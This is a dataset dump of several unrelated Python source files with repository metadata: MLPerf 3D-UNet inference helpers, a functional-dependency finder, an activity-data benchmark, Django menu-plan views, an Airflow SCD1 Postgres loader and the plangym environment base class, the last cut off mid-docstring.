| 0
| 0
| 0
| 0
|
1
| 0
|
5f7b66cd930462b5d1756ba227c23eb8265b8002
| 5,040
|
py
|
Python
|
closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 388
|
2018-09-13T20:48:58.000Z
|
2020-11-23T11:52:13.000Z
|
closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 597
|
2018-10-08T12:45:29.000Z
|
2020-11-24T17:53:12.000Z
|
closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 228
|
2018-11-06T02:04:14.000Z
|
2020-12-09T07:51:02.000Z
|
#! /usr/bin/env python3
# coding=utf-8
# Copyright (c) 2021 NVIDIA CORPORATION. All rights reserved.
# Copyright 2021 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import time
from scipy import signal
from global_vars import *
__doc__ = """
Collection of utilities 3D UNet MLPerf-Inference reference model uses.
gaussian_kernel(n, std):
returns gaussian kernel; std is standard deviation and n is number of points
apply_norm_map(image, norm_map):
applies normal map norm_map to image and return the outcome
apply_argmax(image):
returns indices of the maximum values along the channel axis
finalize(image, norm_map):
finalizes results obtained from sliding window inference
prepare_arrays(image, roi_shape):
returns empty arrays required for sliding window inference upon roi_shape
get_slice_for_sliding_window(image, roi_shape, overlap):
returns indices for image stride, to fulfill sliding window inference
timeit(function):
custom-tailored decorator for runtime measurement of each inference
"""
def gaussian_kernel(n, std):
"""
Returns gaussian kernel; std is standard deviation and n is number of points
"""
gaussian1D = signal.gaussian(n, std)
gaussian2D = np.outer(gaussian1D, gaussian1D)
gaussian3D = np.outer(gaussian2D, gaussian1D)
gaussian3D = gaussian3D.reshape(n, n, n)
gaussian3D = np.cbrt(gaussian3D)
gaussian3D /= gaussian3D.max()
return gaussian3D
def apply_norm_map(image, norm_map):
"""
Applies normal map norm_map to image and return the outcome
"""
image /= norm_map
return image
def apply_argmax(image):
"""
Returns indices of the maximum values along the channel axis
Input shape is (bs=1, channel=3, (ROI_SHAPE)), float -- sub-volume inference result
Output shape is (bs=1, channel=1, (ROI_SHAPE)), integer -- segmentation result
"""
channel_axis = 1
image = np.argmax(image, axis=channel_axis).astype(np.uint8)
image = np.expand_dims(image, axis=0)
return image
def finalize(image, norm_map):
"""
Finalizes results obtained from sliding window inference
"""
# NOTE: layout is assumed to be linear (NCDHW) always
# apply norm_map
image = apply_norm_map(image, norm_map)
# argmax
image = apply_argmax(image)
return image
def prepare_arrays(image, roi_shape=ROI_SHAPE):
"""
Returns empty arrays required for sliding window inference such as:
- result array where sub-volume inference results are gathered
- norm_map where normal map is constructed upon
- norm_patch, a gaussian kernel that is applied to each sub-volume inference result
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
image_shape = list(image.shape[2:])
result = np.zeros(shape=(1, 3, *image_shape), dtype=image.dtype)
norm_map = np.zeros_like(result)
norm_patch = gaussian_kernel(
roi_shape[0], 0.125*roi_shape[0]).astype(norm_map.dtype)
return result, norm_map, norm_patch
def get_slice_for_sliding_window(image, roi_shape=ROI_SHAPE, overlap=SLIDE_OVERLAP_FACTOR):
"""
Returns indices for image stride, to fulfill sliding window inference
Stride is determined by roi_shape and overlap
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
assert isinstance(overlap, float) and overlap > 0 and overlap < 1,\
f"Need sliding window overlap factor in (0,1): {overlap}"
image_shape = list(image.shape[2:])
dim = len(image_shape)
strides = [int(roi_shape[i] * (1 - overlap)) for i in range(dim)]
size = [(image_shape[i] - roi_shape[i]) //
strides[i] + 1 for i in range(dim)]
for i in range(0, strides[0] * size[0], strides[0]):
for j in range(0, strides[1] * size[1], strides[1]):
for k in range(0, strides[2] * size[2], strides[2]):
yield i, j, k
def runtime_measure(function):
"""
A decorator for runtime measurement
Custom-tailored for measuring inference latency
Also prints str: mystr that summarizes work in SUT
"""
def get_latency(*args, **kw):
ts = time.time()
result, mystr = function(*args, **kw)
te = time.time()
print('{:86} took {:>10.5f} sec'.format(mystr, te - ts))
return result, ""
return get_latency
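# Illustrative use of the decorator above (editor's addition; the function name is
# hypothetical). The wrapped callable must return a (result, description) pair,
# because get_latency unpacks exactly two values:
#   @runtime_measure
#   def infer_subvolume(volume):
#       result = do_inference(volume)          # hypothetical helper
#       return result, "sub-volume inference"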
| 32.101911
| 91
| 0.698611
| 727
| 5,040
| 4.734525
| 0.310867
| 0.055782
| 0.020918
| 0.019756
| 0.36258
| 0.32946
| 0.30796
| 0.30796
| 0.286461
| 0.286461
| 0
| 0.017799
| 0.208532
| 5,040
| 156
| 92
| 32.307692
| 0.845074
| 0.333135
| 0
| 0.125
| 0
| 0
| 0.291732
| 0.024025
| 0
| 0
| 0
| 0
| 0.041667
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.263889
| 0.013889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7d2edfb9acb222096440265492c363f375f8a6
| 3,047
|
py
|
Python
|
fdtool/modules/GetFDs.py
|
dancps/FDTool
|
0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a
|
[
"CC0-1.0"
] | 13
|
2019-03-22T13:30:04.000Z
|
2022-02-01T04:46:44.000Z
|
fdtool/modules/GetFDs.py
|
dancps/FDTool
|
0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a
|
[
"CC0-1.0"
] | 3
|
2020-07-01T11:17:40.000Z
|
2022-02-13T11:20:34.000Z
|
fdtool/modules/GetFDs.py
|
dancps/FDTool
|
0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a
|
[
"CC0-1.0"
] | 11
|
2018-07-02T23:46:31.000Z
|
2021-12-14T12:29:38.000Z
|
import binaryRepr
# Create decorator function to see how many times functions are called
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs);
helper.calls = 0
helper.__name__= func.__name__
return helper;
# Calculate Partition (C_k, r(U)) - the partitions
# of each candidate at level k are calculated
# Takes in data frame of relation and a candidate in C_km1
# Outputs partition of Candidate in C_km1 in relation to data frame
@call_counter
def CardOfPartition(Candidate, df):
# If length is one, find number of unique elements in column
if len(Candidate) == 1: return df[Candidate[0]].nunique()
# If length is +1, create groups over which to find number of unique elements
else: return df.drop_duplicates(Candidate).count()[0];
# Obtain FDs(C_km1) - checks the FDs of each
# candidate X in C_k
# - FDs of the form X -> v_i, where
# v_i *Exists* U - X^{+} are checked by
# comparing *Partition* X and *Partition* X v_i
#
# F = Null_Set
# for each candidate X in C_km1
# for each v_i *exists* U - X^{+} \\Pruning rule 3
# if (Cardinality(*Partition* X) == Cardinality(*Partition X v_i)) then
# {
# X* = X *Union* {v_i}
# F = F *Union* {X -> v_i} \\Theorem 2
# }
# return (F);
def f(C_km1, df, Closure, U, Cardinality):
# Set F to null list; Initialize U_c to remaining columns in data frame
F = []; U_c = list(df.head(0));
# Identify the subsets whose cardinality of partition should be tested
SubsetsToCheck = [list(Subset) for Subset in set([frozenset(Candidate + [v_i]) for Candidate in C_km1 for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)]))])];
# Add singleton set to SubsetsToCheck if on first k-level
if len(C_km1[0]) == 1: SubsetsToCheck += C_km1;
# Iterate through subsets mapped to the Cardinality of Partition function
for Cand, Card in zip(SubsetsToCheck, map(CardOfPartition, SubsetsToCheck, [df]*len(SubsetsToCheck))):
# Add Cardinality of Partition to dictionary
Cardinality[binaryRepr.toBin(Cand, U)] = Card;
# Iterate through candidates of C_km1
for Candidate in C_km1:
# Iterate though attribute subsets that are not in U - X{+}; difference b/t U and inclusive closure of candidate
for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)])):
# Check if the cardinality of the partition of {Candidate} is equal to that of {Candidate, v_i}
if Cardinality[binaryRepr.toBin(Candidate, U)] == Cardinality[binaryRepr.toBin(Candidate + [v_i], U)]:
# Add attribute v_i to closure
Closure[binaryRepr.toBin(Candidate, U)].add(v_i)
# Add list (Candidate, v_i) to F
F.append([tuple(Candidate), v_i]);
return Closure, F, Cardinality;
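# Editor's note: because CardOfPartition is wrapped by the call_counter decorator
# above, the number of partition computations performed so far can be inspected at
# any point as CardOfPartition.calls, e.g.
#   print(CardOfPartition.calls)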
| 43.528571
| 187
| 0.637348
| 435
| 3,047
| 4.363218
| 0.305747
| 0.01686
| 0.015806
| 0.031612
| 0.155954
| 0.081138
| 0.061117
| 0.061117
| 0.061117
| 0.061117
| 0
| 0.009362
| 0.263866
| 3,047
| 69
| 188
| 44.15942
| 0.836826
| 0.529373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.041667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7e6f4612c23637da085f15ec80d97da8c65063
| 1,712
|
py
|
Python
|
experiments/benchmarks/activity_benchmark.py
|
Oidlichtnwoada/LongTermDependenciesLearning
|
f2913e86183588107f16402b402524a57b6ea057
|
[
"MIT"
] | 1
|
2021-01-16T15:42:01.000Z
|
2021-01-16T15:42:01.000Z
|
experiments/benchmarks/activity_benchmark.py
|
Oidlichtnwoada/LongTermDependenciesLearning
|
f2913e86183588107f16402b402524a57b6ea057
|
[
"MIT"
] | null | null | null |
experiments/benchmarks/activity_benchmark.py
|
Oidlichtnwoada/LongTermDependenciesLearning
|
f2913e86183588107f16402b402524a57b6ea057
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import pandas as pd
import experiments.benchmarks.benchmark as benchmark
class ActivityBenchmark(benchmark.Benchmark):
def __init__(self):
super().__init__('activity',
(('--sequence_length', 64, int),
('--max_samples', 40_000, int),
('--sample_distance', 4, int),
('--loss_name', 'SparseCategoricalCrossentropy', str),
('--loss_config', {'from_logits': True}, dict),
('--metric_name', 'SparseCategoricalAccuracy', str)))
def get_data_and_output_size(self):
sequence_length = self.args.sequence_length
max_samples = self.args.max_samples
sample_distance = self.args.sample_distance
activity_table = pd.read_csv(os.path.join(self.supplementary_data_dir, 'activity.csv'), header=None)
sensor_inputs = []
time_inputs = []
activity_outputs = []
for activity_marker in activity_table[0].unique():
activity_series = activity_table[activity_table[0] == activity_marker].iloc[:, 1:]
for start_index in range(0, len(activity_series) - sequence_length + 1, sample_distance):
current_sequence = np.array(activity_series[start_index:start_index + sequence_length])
sensor_inputs.append(current_sequence[:, 1:8])
time_inputs.append(current_sequence[:, :1])
activity_outputs.append(current_sequence[-1, 8:])
return (np.stack(sensor_inputs)[:max_samples], np.stack(time_inputs)[:max_samples]), (np.stack(activity_outputs)[:max_samples],), 7
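# Editor's note: the windowing loop above emits overlapping windows of length
# sequence_length every sample_distance steps, i.e. roughly
# (len(activity_series) - sequence_length) // sample_distance + 1 windows per
# activity segment, capped globally at max_samples.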
ActivityBenchmark()
| 45.052632
| 139
| 0.624416
| 186
| 1,712
| 5.424731
| 0.413978
| 0.059465
| 0.062438
| 0.065411
| 0.124876
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014914
| 0.255841
| 1,712
| 37
| 140
| 46.27027
| 0.77708
| 0
| 0
| 0
| 0
| 0
| 0.098715
| 0.031542
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f8081343c9866235ed311ae6467c672bfbe7609
| 4,685
|
py
|
Python
|
apps/menuplans/views.py
|
jajadinimueter/recipe
|
f3f0a4054a14637bf4e49728876fe7b0a029a21f
|
[
"MIT"
] | null | null | null |
apps/menuplans/views.py
|
jajadinimueter/recipe
|
f3f0a4054a14637bf4e49728876fe7b0a029a21f
|
[
"MIT"
] | null | null | null |
apps/menuplans/views.py
|
jajadinimueter/recipe
|
f3f0a4054a14637bf4e49728876fe7b0a029a21f
|
[
"MIT"
] | null | null | null |
import xml.etree.ElementTree as et
from dateutil import parser
from django.shortcuts import render
from django.shortcuts import redirect
from django.core.urlresolvers import reverse
import untangle
from .forms import MenuplanSearchForm
from .forms import MenuplanCreateForm
from .tables import MenuplanTable
from .dbaccess import add_menuplan
from .dbaccess import get_menuplans
from .dbaccess import create_menuplan
from .dbaccess import get_menuplan_display
def index(request):
search_query = None
if request.method == 'POST':
search_form = MenuplanSearchForm(request.POST)
else:
search_form = MenuplanSearchForm()
table_data = []
menuplans = get_menuplans(search_form.data.get('query'))
if menuplans:
document = untangle.parse(menuplans)
if int(document.menuplans['total']) > 0:
for menuplan in document.menuplans.get_elements():
name = menuplan.name.cdata
cd = parser.parse(menuplan.creationDate.cdata)
cd = cd.strftime('%d.%m.%Y %H:%M')
try:
nd = parser.parse(menuplan.name.cdata)
name = nd.strftime('%d.%m.%Y %H:%M')
except:
pass
table_data.append({
'name': name,
'creationDate': cd,
'people': menuplan.people.cdata,
'pk': menuplan.pk.cdata
})
return render(request, 'menuplans/index.html',
{'table': MenuplanTable(table_data),
'search_form': search_form})
def create(request):
if request.method == 'POST':
form = MenuplanCreateForm(request.POST)
if form.is_valid():
data = form.cleaned_data
pk, document = create_menuplan(data['people'], data['menus'])
add_menuplan(pk, et.tostring(document))
return redirect('menuplans.detail', pk=pk)
else:
form = MenuplanCreateForm()
return render(request, 'menuplans/create.html', {'form': form})
def join_non_empty(vals, sep=' '):
return sep.join([x for x in vals if x and x.strip()])
def detail(request, pk):
if request.method == 'GET':
val = get_menuplan_display(pk)
print(val)
display = et.fromstring(val)
menuplan = []
shopping_list = []
recipes = []
for shopping_list_item in display.findall('.//shoppingListItem'):
unit = shopping_list_item.findtext('unit', '')
name = shopping_list_item.findtext('name')
amount = float(shopping_list_item.findtext('amount'))
if not amount:
amount = ''
alpha_values = shopping_list_item.findall('alphaAmounts/value')
if amount or not alpha_values:
shopping_list.append({
'name': name,
'amount': join_non_empty([str(amount), unit])
})
for alpha_value in alpha_values:
shopping_list.append({
'name': name,
'amount': join_non_empty([alpha_value.text, unit])
})
for e_plan in display.findall('days//day'):
menuplan.append({
'day': e_plan.findtext('number'),
'recipe': e_plan.findtext('recipe')
})
for e_recipe in display.findall('recipes//recipe'):
e_ings = e_recipe.findall('.//ingredient')
ingredients = []
for e_ing in e_ings:
ing_name = e_ing.findtext('name')
ing_unit = e_ing.findtext('.//unit', '')
ing_value = e_ing.findtext('.//value', '')
ing_comment = e_ing.findtext('.//comment', '')
ingredients.append(
join_non_empty([ing_value, ing_unit, ing_name, ing_comment]))
ingredients = join_non_empty(ingredients, ', ')
instructions = []
einstructions = e_recipe.findall('.//instruction/text')
for einst in einstructions:
instructions.append(einst.text)
recipes.append({
'name': e_recipe.findtext('name'),
'ingredients': ingredients,
'instructions': instructions
})
print(recipes)
return render(request,
'menuplans/detail.html',
{
'recipes': recipes,
'menuplan': menuplan,
'shopping_list': shopping_list,
})
| 30.225806
| 81
| 0.547492
| 466
| 4,685
| 5.345494
| 0.253219
| 0.048173
| 0.024087
| 0.033721
| 0.07788
| 0.054597
| 0.044159
| 0.044159
| 0.044159
| 0.044159
| 0
| 0.000325
| 0.34365
| 4,685
| 154
| 82
| 30.422078
| 0.809756
| 0
| 0
| 0.132743
| 0
| 0
| 0.089861
| 0.008965
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035398
| false
| 0.00885
| 0.115044
| 0.00885
| 0.19469
| 0.017699
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f809ea0bdda1d52d937bea676c3f2375a0406e8
| 6,448
|
py
|
Python
|
data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py
|
dmitriy-e/metadata-governance
|
018a879951dee3f3c2c05ac8e05b8360dd7f4ab3
|
[
"Apache-2.0"
] | 5
|
2021-12-01T09:55:23.000Z
|
2021-12-21T16:23:33.000Z
|
data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py
|
dmitriy-e/metadata-governance
|
018a879951dee3f3c2c05ac8e05b8360dd7f4ab3
|
[
"Apache-2.0"
] | 1
|
2022-03-14T16:50:41.000Z
|
2022-03-14T16:50:41.000Z
|
data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py
|
dmitriy-e/metadata-governance
|
018a879951dee3f3c2c05ac8e05b8360dd7f4ab3
|
[
"Apache-2.0"
] | 2
|
2021-11-03T09:43:09.000Z
|
2021-11-17T10:16:29.000Z
|
from contextlib import closing
from io import StringIO
import numpy
import pandas
from airflow.providers.postgres.hooks.postgres import PostgresHook
from psycopg2.extensions import connection as psycopg2_connection
from data_detective_airflow.dag_generator.works import WorkType
from data_detective_airflow.operators.sinks.pg_loader import PgLoader, MAX_INSERT_ROWS_NUMBER
class PgSCD1DFUpdateInsert(PgLoader):
"""Update the target table by SCD 1 by diff_change_operation
:param source: Source
:param conn_id: Connection id
:param table_name: Table name for update
:param key: The key by which update. Avoid NULL for the key.
:param diff_change_oper: Field with the flag of the operation to be applied to the record D,U,I
:param chunk_row_number: The number of rows in the chunk to load into the database and apply to the table
"""
ui_color = '#DDF4ED'
def __init__(
self,
source: list,
conn_id: str,
table_name: str,
key: list[str],
diff_change_oper: str,
chunk_row_number: int,
**kwargs
):
super().__init__(**kwargs)
self.conn_id = conn_id
self.table_name = table_name
self.key = key
self.diff_change_oper = diff_change_oper
self.chunk_row_number = chunk_row_number or MAX_INSERT_ROWS_NUMBER
self.source = source[0]
self.source_task = self.dag.task_dict[self.source]
self.source_task >> self # pylint: disable=pointless-statement
def execute(self, context):
hook = PostgresHook(postgres_conn_id=self.conn_id)
work = self.dag.get_work(work_type=WorkType.WORK_PG.value, work_conn_id=self.conn_id)
work.create(context)
source_df = self.source_task.result.read(context)
df_rows = len(source_df.index)
if not df_rows:
self.log.info('Source dataset is empty. Finishing task.')
return
if self.chunk_row_number and self.chunk_row_number < 1:
raise RuntimeError('chunk_row_number must be positive integer or None '
f'Current value is "{self.chunk_row_number}".'
)
chunk_number = self._get_chunk_number(data_row_number=df_rows, chunk_row=self.chunk_row_number)
self.log.info(f'Will process {df_rows} rows in {chunk_number} chunks.')
source_split = numpy.array_split(source_df, chunk_number)
del source_df
source = f"{work.get_path(context)}.{self.table_name.split('.')[-1]}"
for it, chunk in enumerate(source_split):
self.log.info(f'Process chunk #{it + 1} of {chunk_number}.')
with closing(hook.get_conn()) as session:
self._unload_source_to_pg(tmp_table=source, conn=session, unload_df=chunk)
self._apply_diff_change_oper(source_table=source, conn=session)
session.commit()
def _unload_source_to_pg(self, tmp_table: str, conn: psycopg2_connection, unload_df: pandas.DataFrame):
"""Upload DataFrame to TEMPORARY TABLE in postgres
:param tmp_table: Name of the temporary table
:param conn: Connection to the database
:param unload_df: DataFrame to upload to the database
"""
create_query = """
DROP TABLE IF EXISTS {tmp_table} CASCADE;
CREATE TABLE {tmp_table} AS
SELECT {target_columns}, '' as {diff_change_oper}
FROM {target_table}
LIMIT 0
""".strip()
copy_query = """
COPY {tmp_table} ({source_columns})
FROM STDIN WITH (format csv, delimiter ';')
""".strip()
query_params = {
'tmp_table': tmp_table,
'target_columns': ','.join(
self.get_table_columns(table_name=self.table_name, conn=conn)),
'source_columns': ','.join(unload_df.columns),
'target_table': self.table_name,
'diff_change_oper': self.diff_change_oper
}
with closing(conn.cursor()) as cursor:
cursor.execute(create_query.format(**query_params))
s_buf = StringIO()
unload_df.to_csv(
path_or_buf=s_buf, index=False, header=False, sep=';')
s_buf.seek(0)
cursor.copy_expert(copy_query.format(**query_params), s_buf)
def _apply_diff_change_oper(self, source_table: str, conn: psycopg2_connection):
"""Apply diff_change_oper by key, ignores unmodified columns"""
query_params = self._get_query_params(source_table, conn)
delete_query = """
DELETE FROM {target_table} trg
USING {source_table} src
WHERE {key_eq_cond} AND src.{diff_change_oper} = 'D'
""".strip()
update_query = """
UPDATE {target_table} trg
SET {set_term}
FROM {source_table} src
WHERE {key_eq_cond} AND src.{diff_change_oper} = 'U'
""".strip()
insert_query = """
INSERT INTO {target_table}({target_columns})
SELECT {target_columns}
FROM {source_table} src
WHERE src.{diff_change_oper} = 'I'
""".strip()
with closing(conn.cursor()) as cursor:
cursor.execute(delete_query.format(**query_params))
cursor.execute(update_query.format(**query_params))
cursor.execute(insert_query.format(**query_params))
def _get_query_params(self, source_table: str, conn: psycopg2_connection) -> dict[str, str]:
"""Creating parameters for queries"""
all_tgt_columns = self.get_table_columns(self.table_name, conn)
tgt_columns = [col for col in all_tgt_columns if col != 'processed_dttm']
key = self.key if isinstance(self.key, list) else [self.key]
key_eq_cond = ' and '.join(f"trg.{column}=src.{column}" for column in key)
changed_cond = [col for col in tgt_columns if col not in key]
set_term = ', '.join(f"{col} = src.{col}" for col in changed_cond)
if 'processed_dttm' in all_tgt_columns:
set_term = f'{set_term}, processed_dttm = now()'
target_columns = ','.join(tgt_columns)
return {
'target_table': self.table_name,
'source_table': source_table,
'key_eq_cond': key_eq_cond,
'target_columns': target_columns,
'set_term': set_term,
'diff_change_oper': self.diff_change_oper
}
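# Illustrative sketch (not part of the operator above): how the query parameters
# built by _get_query_params render for a hypothetical target table with key
# ['id'] and non-key column 'name'. All table and column names are assumptions.
example_key = ['id']
example_columns = ['id', 'name']  # tgt_columns already excludes 'processed_dttm'
example_key_eq_cond = ' and '.join(f"trg.{col}=src.{col}" for col in example_key)
example_set_term = ', '.join(f"{col} = src.{col}" for col in example_columns if col not in example_key)
# example_key_eq_cond -> "trg.id=src.id"
# example_set_term    -> "name = src.name" (", processed_dttm = now()" is appended when that column exists)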
| 39.317073
| 109
| 0.640199
| 845
| 6,448
| 4.602367
| 0.220118
| 0.041142
| 0.053998
| 0.023142
| 0.163795
| 0.124968
| 0.083312
| 0.046284
| 0.024685
| 0.024685
| 0
| 0.002941
| 0.261787
| 6,448
| 163
| 110
| 39.558282
| 0.814076
| 0.113058
| 0
| 0.107438
| 0
| 0
| 0.233676
| 0.036551
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041322
| false
| 0
| 0.066116
| 0
| 0.140496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f83b8fcb8f9923c7beb83eb883b788a12549bf3
| 32,588
|
py
|
Python
|
plangym/core.py
|
FragileTech/plangym
|
9a1482bea099f12f82bae27f1c5d13393daa8032
|
[
"MIT"
] | 3
|
2020-03-25T22:19:17.000Z
|
2020-11-02T16:11:32.000Z
|
plangym/core.py
|
FragileTech/plangym
|
9a1482bea099f12f82bae27f1c5d13393daa8032
|
[
"MIT"
] | 44
|
2020-03-25T14:17:54.000Z
|
2022-03-12T00:18:48.000Z
|
plangym/core.py
|
FragileTech/plangym
|
9a1482bea099f12f82bae27f1c5d13393daa8032
|
[
"MIT"
] | 2
|
2020-03-25T12:17:12.000Z
|
2020-06-19T23:07:52.000Z
|
"""Plangym API implementation."""
from abc import ABC
from typing import Any, Callable, Dict, Generator, Iterable, Optional, Tuple, Union
import gym
from gym.envs.registration import registry as gym_registry
from gym.spaces import Space
import numpy
import numpy as np
wrap_callable = Union[Callable[[], gym.Wrapper], Tuple[Callable[..., gym.Wrapper], Dict[str, Any]]]
class BaseEnvironment(ABC):
"""Inherit from this class to adapt environments to different problems."""
STATE_IS_ARRAY = True
RETURNS_GYM_TUPLE = True
SINGLETON = False
def __init__(
self,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
):
"""
Initialize a :class:`Environment`.
Args:
name: Name of the environment.
frameskip: Number of times ``step`` will be called with the same action.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
"""
self._name = name
self.frameskip = frameskip
self.autoreset = autoreset
self.delay_init = delay_init
if not delay_init:
self.init_env()
@property
def unwrapped(self) -> "BaseEnvironment":
"""
Completely unwrap this Environment.
Returns:
plangym.Environment: The base non-wrapped plangym.Environment instance
"""
return self
@property
def name(self) -> str:
"""Return is the name of the environment."""
return self._name
@property
def obs_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the observations returned by the Environment."""
raise NotImplementedError()
@property
def action_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the actions applied to the Environment."""
raise NotImplementedError()
def __del__(self):
"""Teardown the Environment when it is no longer needed."""
return self.close()
def step(
self,
action: Union[numpy.ndarray, int, float],
state: numpy.ndarray = None,
dt: int = 1,
) -> tuple:
"""
Step the environment applying the supplied action.
Optionally set the state to the supplied state before stepping it.
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
state: Set the environment to the given state before stepping it.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
if state is not None:
self.set_state(state)
obs, reward, terminal, info = self.step_with_dt(action=action, dt=dt)
if state is not None:
new_state = self.get_state()
data = new_state, obs, reward, terminal, info
else:
data = obs, reward, terminal, info
if terminal and self.autoreset:
self.reset(return_state=False)
return data
def step_batch(
self,
actions: Union[numpy.ndarray, Iterable[Union[numpy.ndarray, int]]],
states: Union[numpy.ndarray, Iterable] = None,
dt: Union[int, numpy.ndarray] = 1,
) -> Tuple[numpy.ndarray, ...]:
"""
Vectorized version of the `step` method. It allows stepping a vector of \
states and actions.
The signature and behaviour are the same as `step`, but taking a list of \
states, actions and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)``
else returns ``(new_states, observs, rewards, ends, infos)``
"""
dt = (
dt
if isinstance(dt, (numpy.ndarray, Iterable))
else numpy.ones(len(actions), dtype=int) * dt
)
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
data = [self.step(action, state, dt=dt) for action, state, dt in zip(actions, states, dt)]
return tuple(list(x) for x in zip(*data))
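# Hedged illustration of the broadcasting above (not part of plangym):
# step_batch(actions=[a0, a1, a2], dt=2) expands dt to [2, 2, 2], calls ``step``
# once per (action, state, dt) triple, and the final zip transposes the results
# into (observs, rewards, terminals, infos), each a list of length 3.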
def init_env(self) -> None:
"""
Run environment initialization.
Include in this function all the code which makes the environment impossible
to serialize; this allows the environment to be dispatched to different workers
and initialized once it has been copied to the target process.
"""
pass
def close(self) -> None:
"""Tear down the current environment."""
pass
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
pass
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
tuple containing ``(observs, reward, terminal, info)``.
"""
raise NotImplementedError()
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``(state, obs)`` if ``return_state`` is ``True``, else ``obs``.
"""
raise NotImplementedError()
def get_state(self) -> Any:
"""
Recover the internal state of the simulation.
A state must completely describe the Environment at a given moment.
"""
raise NotImplementedError()
def set_state(self, state: Any) -> None:
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
Returns:
None
"""
raise NotImplementedError()
def get_image(self) -> Union[None, np.ndarray]:
"""
